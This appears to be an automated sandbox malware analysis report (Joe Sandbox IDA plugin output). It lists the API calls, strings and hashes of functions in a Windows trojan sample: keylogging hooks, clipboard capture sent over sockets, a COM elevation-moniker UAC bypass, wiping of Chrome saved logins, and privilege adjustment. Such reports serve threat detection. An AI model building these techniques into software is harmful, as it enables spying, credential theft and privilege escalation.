                              • OpenClipboard.USER32 ref: 004159C7
                              • EmptyClipboard.USER32 ref: 004159D5
                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                              • GlobalLock.KERNEL32(00000000), ref: 004159FE
                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                              • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                              • CloseClipboard.USER32 ref: 00415A5A
                              • OpenClipboard.USER32 ref: 00415A61
                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                              • CloseClipboard.USER32 ref: 00415A89
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                              • String ID:
                              • API String ID: 3520204547-0
                              • Opcode ID: b6563c01279e5a2def22d7282fda85c49e98bc11e37defa9611b1278314c6eef
                              • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                              • Opcode Fuzzy Hash: b6563c01279e5a2def22d7282fda85c49e98bc11e37defa9611b1278314c6eef
                              • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                              Function 00418754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0$1$2$3$4$5$6$7
                              • API String ID: 0-3177665633
                              • Opcode ID: b1fb05e11c356ba634f14b88ac069ae329bf2eb132947a5908c699400be529fa
                              • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                              • Opcode Fuzzy Hash: b1fb05e11c356ba634f14b88ac069ae329bf2eb132947a5908c699400be529fa
                              • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                              Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                              Download Yara Rule
                              APIs
                              • GetForegroundWindow.USER32 ref: 00409B3F
                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                              • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                              • GetKeyState.USER32(00000010), ref: 00409B5C
                              • GetKeyboardState.USER32(?), ref: 00409B67
                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                              • String ID: 8[G
                              • API String ID: 1888522110-1691237782
                              • Opcode ID: 62c4c2556f5e099e9a9792d70b860f0f67bc178eac4334f9f50af38fee2ec64e
                              • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                              • Opcode Fuzzy Hash: 62c4c2556f5e099e9a9792d70b860f0f67bc178eac4334f9f50af38fee2ec64e
                              • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                              Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                              Download Yara Rule
                              APIs
                              • _wcslen.LIBCMT ref: 00406788
                              • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Object_wcslen
                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                              • API String ID: 240030777-3166923314
                              • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                              • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                              • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                              • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                              Function 004198C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                              Download Yara Rule
                              APIs
                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                              • GetLastError.KERNEL32 ref: 00419935
                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                              • String ID:
                              • API String ID: 3587775597-0
                              • Opcode ID: 5f0a1bae1b201243f86f7b2652fdc4feea69b887222197adb83933992660ffc8
                              • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                              • Opcode Fuzzy Hash: 5f0a1bae1b201243f86f7b2652fdc4feea69b887222197adb83933992660ffc8
                              • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                              Function 004513B7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                              • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                              • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                              • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                              • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                              • String ID: <D$<D$<D
                              • API String ID: 745075371-3495170934
                              • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                              • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                              • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                              • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                              Function 004099E4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                              • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                              • GetLastError.KERNEL32 ref: 00409A1B
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                              • TranslateMessage.USER32(?), ref: 00409A7A
                              • DispatchMessageA.USER32(?), ref: 00409A85
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                              • String ID: Keylogger initialization failure: error $`#v
                              • API String ID: 3219506041-3226811161
                              • Opcode ID: f914becb081a9993f33aad084fbf751b59400094a878ef3f25fa208854e2a2a1
                              • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                              • Opcode Fuzzy Hash: f914becb081a9993f33aad084fbf751b59400094a878ef3f25fa208854e2a2a1
                              • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                              Function 0041B42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                              • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                              • String ID:
                              • API String ID: 2341273852-0
                              • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                              • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                              • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                              • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                              Function 00418C69 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Find$CreateFirstNext
                              • String ID: @CG$XCG$`HG$`HG$>G
                              • API String ID: 341183262-3780268858
                              • Opcode ID: 314f7862f17973a04938054c00c2ef7007abd4565c09ecf4f516cc3f43255245
                              • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                              • Opcode Fuzzy Hash: 314f7862f17973a04938054c00c2ef7007abd4565c09ecf4f516cc3f43255245
                              • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                              Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                              • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressCloseCreateLibraryLoadProcsend
                              • String ID: SHDeleteKeyW$Shlwapi.dll
                              • API String ID: 2127411465-314212984
                              • Opcode ID: d39c156f049645e1e34bb5f696c90ccd950e8ff77380a009300117a18b17bcce
                              • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                              • Opcode Fuzzy Hash: d39c156f049645e1e34bb5f696c90ccd950e8ff77380a009300117a18b17bcce
                              • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                              Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                              Download Yara Rule
                              APIs
                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                              • GetLastError.KERNEL32 ref: 0040B261
                              Strings
                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                              • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                              • UserProfile, xrefs: 0040B227
                              • [Chrome StoredLogins not found], xrefs: 0040B27B
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: DeleteErrorFileLast
                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              • API String ID: 2018770650-1062637481
                              • Opcode ID: 4cd32df34f682fcf287b1bbdb8b1e04e90f5886a02fc20745afa94da3ae3815b
                              • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                              • Opcode Fuzzy Hash: 4cd32df34f682fcf287b1bbdb8b1e04e90f5886a02fc20745afa94da3ae3815b
                              • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                              Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                              • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                              • GetLastError.KERNEL32 ref: 00416B02
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                              • String ID: SeShutdownPrivilege
                              • API String ID: 3534403312-3733053543
                              • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                              • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                              • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                              • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                              Function 00452F00 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: __floor_pentium4
                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                              • API String ID: 4168288129-2761157908
                              • Opcode ID: d8351365d2e61d61fcb96909c2723c4d7c28a1330773510c4eacdd77b9f22045
                              • Instruction ID: 57cc16b57fb9b80973019f24a4c29afa226e887048a240d5689d112d8919aadd
                              • Opcode Fuzzy Hash: d8351365d2e61d61fcb96909c2723c4d7c28a1330773510c4eacdd77b9f22045
                              • Instruction Fuzzy Hash: 08C26F72D046288FDB25CE28DD407EAB7B5EB44346F1441EBD84DE7242E778AE898F44
                              Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 004089AE
                                • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                              • String ID:
                              • API String ID: 4043647387-0
                              • Opcode ID: d98ae4e7daef9a3e69c640f90a7d5488ff890335ded2551db512d4fe34539071
                              • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                              • Opcode Fuzzy Hash: d98ae4e7daef9a3e69c640f90a7d5488ff890335ded2551db512d4fe34539071
